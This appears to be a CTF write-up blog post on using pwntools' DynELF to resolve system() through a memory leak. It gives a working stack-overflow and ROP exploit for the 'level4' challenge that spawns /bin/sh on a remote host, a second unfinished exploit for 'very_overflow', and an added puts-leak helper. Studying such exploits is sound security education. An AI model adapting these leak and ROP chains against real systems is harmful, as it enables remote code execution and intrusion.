Level4--DynELF
DynELF is a pwntools tool that resolves a function's address without a libc file, given a primitive that can read arbitrary memory.
Usually you leak the addresses stored in two functions' GOT entries, identify the libc version from them, and from that compute the address of the function you want.
libc version query
When the libc version cannot be identified, DynELF can search memory directly instead. But DynELF times out easily, so use it with caution.
Taking Level4 as an example, this simply records how DynELF is used (the binary is linked from the original post as "get file").
The program has no protections enabled, and the vulnerability is straightforward: a read() overflows the stack buffer directly.
The libc version cannot be identified from the addresses in write.got and read.got, and it is not convenient to make the system call directly either.
So DynELF is used to find the address of system(), then "/bin/sh" is written into the .bss section with read(), and system("/bin/sh") gives a shell.
#!/usr/bin/env python
# coding=utf-8
# Python 2 pwntools script (str payloads, print statement)
from pwn import *

# context.log_level = "debug"
io = remote("pwn2.jarvisoj.com", 9880)
elf = ELF("./level4")

# PLT entries of the two imported functions
read_plt = elf.plt["read"]
write_plt = elf.plt["write"]
vuln_addr = 0x804844b   # vulnerable function; returning here lets the overflow be reused
main_addr = 0x8048470
bss_addr = 0x804a024    # writable .bss, will hold "/bin/sh"


def leak(address):
    # overflow the 0x88-byte buffer plus saved ebp, then call write(1, address, 4)
    payload = 'a' * (0x88 + 0x4)
    payload += p32(write_plt) + p32(vuln_addr)   # return into vuln so the exploit can be reused
    payload += p32(1) + p32(address) + p32(4)    # 4 bytes of data per leak are enough
    io.send(payload)
    data = io.recv(4)
    print "%#x => %s" % (address, (data or '').encode('hex'))
    return data


# DynELF walks the ELF structures in memory through leak() to find system()
dyn = DynELF(leak, elf=ELF("./level4"))
sys_addr = dyn.lookup("__libc_system", "libc")
# print hex(sys_addr)

# read(1, bss_addr, 10) then return into system(); the fake return address 1
# becomes system()'s return address and bss_addr becomes its argument
payload = 'a' * (0x88 + 0x4)
payload += p32(read_plt) + p32(sys_addr)
payload += p32(1) + p32(bss_addr) + p32(10)
io.send(payload)
io.sendline("/bin/sh")
io.interactive()
A more detailed and more theoretical introduction to DynELF: https://www.anquanke.com/post/id/85129
For another challenge, very_overflow, I also wanted to try this method, using a puts-based structure as the leak function.
I think the theory is the same as for level4, but I failed to get the system address successfully.
The script and errors are as follows; I hope any passing expert can give me a few pointers.
#!/usr/bin/env python
# -*- coding=utf-8 -*-
# Python 2 pwntools script
from pwn import *

context.log_level = "debug"
# io = remote("hackme.inndy.tw", 7705)
io = process("./very_overflow")
elf = ELF("./very_overflow")
puts_addr = elf.plt["puts"]
puts_got = elf.got["puts"]
vuln_addr = 0x8048853


def debug():
    raw_input("enter>>")
    # gdb.stop()
    gdb.attach(io)


def fill():
    # create 128 notes of 128 'a' bytes each
    sss = 'a' * 128
    for i in range(128):
        io.recvuntil("Action:")
        io.sendline("1")
        io.recvuntil("Note:")
        io.sendline(sss)


def leak(address):
    count = 0
    data = ''
    fill()
    io.recvuntil("Action:")
    # io.sendline("3")
    io.recvuntil("Show:")
    io.sendline("127")
    io.recvuntil("Action:")
    io.sendline("1")
    # mz
    io.recvuntil("Note:")
    debug()
    payload = p32(0) + 'a' * 12
    payload += p32(puts_addr) + p32(vuln_addr) + p32(address)
    # debug()
    io.sendline(payload)
    # note id
    io.recvline()
    # puts output: read byte by byte until a newline followed by the menu's "1"
    up = ''
    while 1:
        c = io.recv(1)
        count += 1
        if up == '\n' and c == '1':
            # the newline that ended puts() stands for the NUL byte in memory
            # (str is immutable, so the original item assignment is rewritten)
            data = data[:-1] + '\x00'
            break
        else:
            data += c
        up = c
    print data
    data = data[:4]
    '''
    for i in range(4):
        data += io.recv(numb=1, timeout=1)
    '''
    print "%#x => %s" % (address, (data or '').encode('hex'))
    return data


dyn = DynELF(leak, elf=ELF("./very_overflow"))
sys_addr = dyn.lookup("__libc_system", "libc")
print hex(sys_addr)
'''
io.recvuntil("Action:")
io.sendline("3")
io.recvuntil("Show:")
io.sendline("127")
io.recvline()
switch_addr = io.recvline()[10:-1]
print switch_addr
'''
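Added example (not from the original post and not pwntools code): a general caveat for puts()-based leak callbacks of the kind the very_overflow script above relies on. puts() stops at the first NUL and appends a newline, while DynELF expects its leak function to return at least one byte per call, so a read of memory whose first byte is 0x00 must come back as a single NUL byte rather than an empty string, and the trailing newline must be stripped. The target memory, BASE and fake_puts() below are constructed stand-ins, and the code is Python 3.

```python
BASE = 0x0804a000
# Constructed stand-in for target memory (not real bytes from the binary):
# an ELF magic, a run of NULs, a string and a little-endian pointer.
IMAGE = (b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
         + b"/bin/sh\x00" + b"\xb0\x84\x04\x08")


def fake_puts(address):
    """Model of the vulnerable program's puts(address): it prints the bytes
    up to the first NUL and then a newline, so a NUL byte never shows up."""
    off = address - BASE
    if not 0 <= off < len(IMAGE):
        raise ValueError("address outside the constructed image")
    end = IMAGE.find(b"\x00", off)
    if end == -1:
        end = len(IMAGE)
    return IMAGE[off:end] + b"\n"


def puts_leak(address, puts=fake_puts):
    """Leak callback in the shape DynELF wants: at least one byte, or None.
    Empty puts() output means the byte at `address` is NUL, so return exactly
    one NUL instead of an empty string (which gives the resolver no progress)."""
    raw = puts(address)
    if not raw.endswith(b"\n"):
        return None  # desynchronised from the menu: report a failed leak
    data = raw[:-1]
    return data if data else b"\x00"


def read_exact(address, n, leak=puts_leak):
    """Read n bytes by chaining leak() calls, one per NUL-terminated run.
    This is how a resolver assembles values that contain NUL bytes
    (e.g. the pointer 0x080484b0) out of a puts()-based primitive."""
    out = b""
    while len(out) < n:
        chunk = leak(address + len(out))
        if chunk is None:
            raise RuntimeError("leak failed at %#x" % (address + len(out)))
        out += chunk
    return out[:n]


def read_u32(address):
    """Little-endian 32-bit read, the unit in which ELF structures are walked."""
    return int.from_bytes(read_exact(address, 4), "little")
```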
Thanks to the big guys for their advice!
Spicy Chicken with small spectrum
Source: http://www.cnblogs.com/ZHijack/
Reproduction is welcome; please credit the source.